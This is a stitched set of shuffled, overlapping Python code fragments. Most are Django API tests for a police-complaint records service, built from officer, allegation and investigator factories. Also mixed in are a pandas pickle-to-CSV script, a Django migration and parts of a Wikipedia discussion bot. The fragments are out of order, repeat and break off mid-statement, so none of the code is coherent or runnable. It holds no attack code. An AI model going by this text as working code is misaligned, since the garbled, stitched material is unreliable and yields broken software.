final_finding='NS',", "= InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory(", "id=1, first_name='Ellis', last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2", "from email_service.factories import EmailTemplateFactory class CRMobileViewSetTestCase(CRTestCaseMixin, APITestCase): def test_retrieve(self): area = AreaFactory(name='Lincoln Square')", "race='White', rank='Officer', 
appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2, trr_percentile=3.3, allegation_count=1, sustained_count=1, )", "response = self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a", "add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20),", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT )", "last_name='May', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True)", "civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2,", "'112233' }) expect(mock_send_attachment_request_email).to.be.called_once_with( '<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233')", "kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} ) expect(response2.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response2.data).to.eq({ 'message': 'Email already added', 'crid': '112233'", "final_finding='SU', disciplined=True, final_outcome='Separation', start_date=date(2003, 3, 20), 
end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special", "System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M',", "OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer,", "2, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, {", "id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1, internal_allegation_percentile=2.2,", "1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002,", "kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document',", "location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) )", "'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, { 'involved_type': 'investigator', 'officer_id': 4, 'full_name':", "'4.4000', 'percentile_allegation_civilian': '1.1000', 
'percentile_allegation_internal': '2.2000', 'percentile_trr': '3.3000', } ], 'complainants': [ { 'race':", "'involved_type': 'police_witness', 'officer_id': 3, 'full_name': '<NAME>', 'allegation_count': 1, 'sustained_count': 1, 'percentile_allegation': '9.9000', 'percentile_trr':", "2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) PoliceWitnessFactory(officer=officer, allegation=allegation) investigator = OfficerFactory(", "AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message':", "} ], 'attachments': [ { 'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id':", "data.factories import ( OfficerFactory, AllegationFactory, OfficerAllegationFactory, ComplainantFactory, AreaFactory, PoliceWitnessFactory, InvestigatorFactory, InvestigatorAllegationFactory, AllegationCategoryFactory, AttachmentFileFactory,", "race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26),", "OfficerFactory( id=123, first_name='Mr', last_name='Foo', gender='M', race='White', rank='Officer', appointed_date=date(2001, 1, 1), birth_year=1993, complaint_percentile=4.4, civilian_allegation_percentile=1.1,", "appointed_date=date(2001, 5, 1), complaint_percentile=9.9, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) OfficerBadgeNumberFactory(officer=investigator_2, star='456789', current=True) OfficerAllegationFactory(", "OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) 
OfficerAllegationFactory(", "'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>',", "'2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address': '3510 Michigan Ave, Chicago', 'location': 'Police Communications", "def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST)", "kwargs={'pk': 321})) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid email' }) def test_request_document_with_invalid_email(self):", "is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006, 5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18')", "'Police Communications System', 'beat': 'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'officer_id': 1,", "21), incident_date=datetime(2007, 2, 28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area,", "id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report document', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT", "internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_3 = OfficerFactory( id=4, first_name='Edward', last_name='May', appointed_date=date(2001, 5, 1),", "'percentile_allegation_civilian': '7.7000', 'percentile_allegation_internal': '8.8000', }, { 'involved_type': 'investigator', 'officer_id': 2, 'full_name': '<NAME>', 'badge':", "allegation.crid}), 
{'email': '<EMAIL>'} ) response2 = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': allegation.crid}), {'email': '<EMAIL>'} )", "datetime, date from django.urls import reverse from django.contrib.gis.geos import Point from mock import", "'<EMAIL>', attachment_type='cr_request', pk='112233', ) def test_request_same_document_twice(self): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) allegation = AllegationFactory(crid='112233') self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk':", "final_finding='SU', final_outcome='Separation', start_date=date(2003, 3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', allegation_name='Secondary/Special Employment'", "id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer,", "= InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn') InvestigatorAllegationFactory( allegation=allegation, investigator=investigator, current_star='123456'", "12.0, 'lat': 21.0 }, 'summary': 'Summary', 'incident_date': '2007-02-28', 'start_date': '2003-03-20', 'end_date': '2006-05-26', 'address':", "investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 = InvestigatorFactory(first_name='Kevin', last_name='Osborn')", "'Lincoln Square', 'involvements': [ { 'involved_type': 'investigator', 'full_name': '<NAME>', 'badge': 'COPA/IPRA', }, {", "'category': 'Operation/Personnel Violations', 'allegation_name': 'Secondary/Special Employment' }, 'coaccused': [ { 'id': 123, 'full_name':", "'rank': 'Officer', 'final_outcome': 
'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel Violations', 'percentile_allegation': '4.4000',", "test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233')", ") ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5,", "self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post(", "= self.client.post(reverse('api-v2:cr-mobile-request-document', kwargs={'pk': 321}), {'email': 'invalid@email'}) expect(response.status_code).to.eq(status.HTTP_400_BAD_REQUEST) expect(response.data).to.eq({ 'message': 'Please enter a valid", "'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area = AreaFactory(name='Lincoln Square')", "OfficerAllegationFactory( officer=investigator, final_finding='NS', start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator", ") officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1,", "3, 20), end_date=date(2006, 5, 26), allegation_category=AllegationCategoryFactory( category='Operation/Personnel Violations', 
allegation_name='Secondary/Special Employment' ) ) officer", "5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8, allegation_count=1, sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome',", "last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=9.9, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003,", "EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({", "'title': 'CR document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def", "last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5, allegation_count=1, sustained_count=1, ) OfficerAllegationFactory( officer=officer, final_finding='SU', start_date=date(2003,", "[ { 'involved_type': 'investigator', 'officer_id': 1, 'full_name': '<NAME>', 'badge': 'CPD', 'percentile_allegation': '6.6000', 'percentile_allegation_civilian':", "allegation__is_officer_complaint=False ) investigator = InvestigatorFactory(officer=investigator) investigator_2 = InvestigatorFactory(officer=investigator_2) investigator_3 = InvestigatorFactory(officer=investigator_3) investigator_4 =", "response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'})) expect(response.status_code).to.eq(status.HTTP_404_NOT_FOUND) @patch('cr.views.send_attachment_request_email') def test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response", "allegation=allegation) investigator = OfficerFactory( id=1, first_name='Ellis', 
last_name='Skol', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7, internal_allegation_percentile=8.8,", "document', 'file_type': 'document', 'url': 'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_badge(self): area", "OfficerBadgeNumberFactory, VictimFactory ) from data.constants import MEDIA_TYPE_DOCUMENT from cr.tests.mixins import CRTestCaseMixin from data.cache_managers", "test_request_document(self, mock_send_attachment_request_email): EmailTemplateFactory(type=CR_ATTACHMENT_REQUEST) AllegationFactory(crid='112233') response = self.client.post( reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} )", "28, tzinfo=pytz.utc), add1=3510, add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003,", "reverse('api-v2:cr-mobile-request-document', kwargs={'pk': '112233'}), {'email': '<EMAIL>'} ) expect(response.status_code).to.eq(status.HTTP_200_OK) expect(response.data).to.eq({ 'message': 'Thanks for subscribing', 'crid':", "123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation', 'final_finding': 'Sustained', 'allegation_count': 1, 'category': 'Operation/Personnel", "allegation=allegation, investigator=investigator, current_star='123456' ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None", "add2='Michigan Ave', city='Chicago', location='Police Communications System', beat=area, is_officer_complaint=False, summary='Summary', first_start_date=date(2003, 3, 20), first_end_date=date(2006,", "5, 26) ) ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1,", 
"sustained_count=0, ) investigator_2 = OfficerFactory( id=2, first_name='Jerome', last_name='Finnigan', appointed_date=date(2001, 5, 1), complaint_percentile=6.6, civilian_allegation_percentile=7.7,", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_2, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_3, current_star=None ) InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4,", "Employment' }, 'coaccused': [ { 'id': 123, 'full_name': '<NAME>', 'rank': 'Officer', 'final_outcome': 'Separation',", ") AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation,", ") ) officer = OfficerFactory( id=3, first_name='Raymond', last_name='Piwinicki', appointed_date=date(2001, 5, 1), complaint_percentile=4.4, trr_percentile=5.5,", "'http://cr-document.com/', 'id': '123456', } ] }) def test_retrieve_not_found(self): response = self.client.get(reverse('api-v2:cr-mobile-detail', kwargs={'pk': '45678'}))", "cr.tests.mixins import CRTestCaseMixin from data.cache_managers import officer_cache_manager, allegation_cache_manager from email_service.constants import CR_ATTACHMENT_REQUEST from", "allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR arrest report", "ComplainantFactory(allegation=allegation, gender='M', race='Black', age='18') VictimFactory(allegation=allegation, gender='M', race='Black', age=53) OfficerAllegationFactory( officer=officer1, allegation=allegation, final_finding='SU', final_outcome='Separation',", "start_date=date(2003, 2, 28), allegation__incident_date=datetime(2002, 2, 28, tzinfo=pytz.utc), allegation__is_officer_complaint=False ) investigator = 
InvestigatorFactory(officer=investigator) InvestigatorAllegationFactory(", "InvestigatorAllegationFactory( allegation=allegation, investigator=investigator_4, current_star=None ) AttachmentFileFactory( tag='TRR', allegation=allegation, title='CR document', id='123456', url='http://cr-document.com/', file_type=MEDIA_TYPE_DOCUMENT" ]
[ "return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" )", "import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\",", "\"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items():", "convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric, values in", "DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data):", "= defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items(): for", "enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df =", "as pd from collections import defaultdict import pickle from typing import DefaultDict cmap_data", "%% import pandas as pd from collections import defaultdict import pickle from typing", "data.items(): for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model +", "from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) #", "defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items(): for i,", "pd from collections import defaultdict import pickle from typing import DefaultDict cmap_data =", "def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\")", "rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) 
save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data),", "metrics in data.items(): for metric, values in metrics.items(): for i, value in enumerate(values):", "pandas as pd from collections import defaultdict import pickle from typing import DefaultDict", "pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict)", "= pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics", "i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data,", "for model, metrics in data.items(): for metric, values in metrics.items(): for i, value", "value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path):", "# %% import pandas as pd from collections import defaultdict import pickle from", "save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\") # %%", "import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def", "+ f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path)", "pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\"))", "value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\"", "import pandas as pd from collections import defaultdict 
import pickle from typing import", "for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"]", "def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric, values", "= value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data),", "# %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for", "typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %%", "collections import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\"))", "values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value", "for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def", "save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv( convert_to_metric_first(cmap_data), \"./cmap_report_transformer.csv\" ) save_to_csv(convert_to_metric_first(mm_data), \"./mm_report_transformer.csv\") #", "from collections import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\",", "f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data) df.to_csv(save_path) save_to_csv(", "= pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows =", "in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] = value return", "rows = defaultdict(dict) for model, metrics in data.items(): for metric, values in metrics.items():", "metrics.items(): for i, value in enumerate(values): rows[metric][model 
+ f\"_{i}\"] = value return rows", "\"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for", "cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows", "rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df = pd.DataFrame(data)", "%% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in data.items(): for metric,", "pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model, metrics in", "defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data =", "metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model + f\"_{i}\"] =", "in data.items(): for metric, values in metrics.items(): for i, value in enumerate(values): rows[metric][model", "import defaultdict import pickle from typing import DefaultDict cmap_data = pickle.load(open(\"./cmap_transformer.pkl\", \"rb\")) mm_data", "model, metrics in data.items(): for metric, values in metrics.items(): for i, value in", "mm_data = pickle.load(open(\"./mm_report_transformer.pkl\", \"rb\")) # %% def convert_to_metric_first(data): rows = defaultdict(dict) for model,", "in enumerate(values): rows[metric][model + f\"_{i}\"] = value return rows def save_to_csv(data, save_path): df" ]
[ "05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'),", "models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField(", "[ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'),", "<reponame>SACGF/variantgrid # Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations,", "Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1), ), ]", "= [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A',", "class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext',", "'0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple", "operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'),", "'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1),", "2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification',", "3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies =", "Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class", "on 2021-02-01 05:55 from django.db import migrations, models class 
Migration(migrations.Migration): dependencies = [", "] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms", "field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U',", "django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations", "Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration): dependencies", "by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models class Migration(migrations.Migration):", "Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status',", "= [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms", "migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N',", "migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [", "'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User", "# Generated by Django 3.1 on 2021-02-01 05:55 from django.db import migrations, models", "import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations =", "dependencies = [ ('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', 
field=models.CharField(choices=[('T',", "('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N',", "('classification', '0018_auto_20210201_1004'), ] operations = [ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M',", "model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not", "[ migrations.AlterField( model_name='conditiontext', name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'),", "from django.db import migrations, models class Migration(migrations.Migration): dependencies = [ ('classification', '0018_auto_20210201_1004'), ]", "name='status', field=models.CharField(choices=[('T', 'Terms Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'),", "Provided'), ('M', 'Multiple Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')],", "Terms Provided'), ('A', 'Auto-Matched'), ('N', 'Not Auto-Matched'), ('U', 'User Reviewed')], default='N', max_length=1), )," ]
[ "name = str(section.get(0).title.strip_code()).strip() sections.add(_Section(name, timestamp)) return sections def _load_pages(self, titles): \"\"\"Load a chunk", "page.save(summary, minor=False) def _process(self, project, updated): \"\"\"Process new discussions for the given project.\"\"\"", "\"{{WPX new discussion|color={{{1|#37f}}}|title=%(title)s|section=%(name)s|timestamp=%(timestamp)s}}\" discitems = [ template % { \"title\": disc.title, \"name\": disc.name,", "(ns, title) in cursor.fetchall()] self._logger.debug(\"Fetching sections for %s pages\", len(titles)) sections = {}", "a list of section tuples for the given page.\"\"\" code = mwparserfromhell.parse(text) sections", "tuples. The only pages included in the dict are those that have been", "15 DISCUSSIONS_BEFORE_FOLD = 4 @staticmethod def _parse_timestamp(text): \"\"\"Return a datetime for the given", "if disc.title not in current][:3] return discussions, news def _save_discussions(self, project, title, discussions,", "updated between %s and %s\", startts, endts) with self._bot.wikidb as cursor: cursor.execute(query, (startts,", "Given a WikiProject new discussions page, return all discussions currently listed. \"\"\" text", "dict mapping talk page titles to lists of section tuples. 
